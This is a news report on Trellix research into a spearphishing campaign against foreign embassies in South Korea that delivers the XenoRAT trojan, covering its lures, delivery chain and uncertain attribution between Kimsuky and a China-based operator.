A state-sponsored espionage operation is targeting foreign embassies in South Korea to deploy the XenoRAT malware from malicious GitHub repositories, according to researchers from Trellix.
The campaign, which Trellix says has been running since March and has launched at least 19 spearphishing attacks against high-value targets, shows infrastructure and techniques that align with the North Korean actor Kimsuky (APT43). However, some indicators point to a China-based operator, Trellix said.
The operation unfolds in three phases, each with distinct email lures from March through July. In March, initial probing targeted a Central European embassy; by May, the threat actor shifted to more complex diplomatic lures. In one May 13 email, a Western European embassy was targeted with a message from a supposed EU delegation official about a Political Advisory Meeting.
From June to July, attackers pivoted to themes related to the U.S.-Korea military alliance. The campaigns relied on highly contextual, multilingual lures written in Korean, English, Persian, Arabic, French and Russian. The messages were often timed to match real-world events and came from impersonated diplomats.
Delivery followed a consistent pattern: password-protected ZIP archives hosted on Dropbox, Google Drive or Daum storage services, which helped evade some email defenses. Opening the ZIPs would reveal a LNK file disguised as a PDF; when executed, it runs obfuscated PowerShell code to fetch the XenoRAT payload from GitHub or Dropbox and to maintain persistence via scheduled tasks.
XenoRAT itself is a capable trojan that can log keystrokes, capture screenshots, access the webcam and microphone, transfer files and provide a remote shell. Trellix noted the malware is loaded directly in memory via reflection and is obfuscated with Confuser Core 1.6.0, aiding stealth on compromised machines.
Attribution remains uncertain, with Trellix describing the campaign as consistent with APT43 (Kimsuky) but noting a majority of attacker activity aligns with a China-based operator. The researchers cited the use of Korean email services, GitHub-based C2 infrastructure and a unique GUID and mutex as indicators linked to Kimsuky, while timezone patterns and holiday pauses point to Chinese sponsorship or involvement. Trellix assigns a medium level of confidence to the APT43 attribution.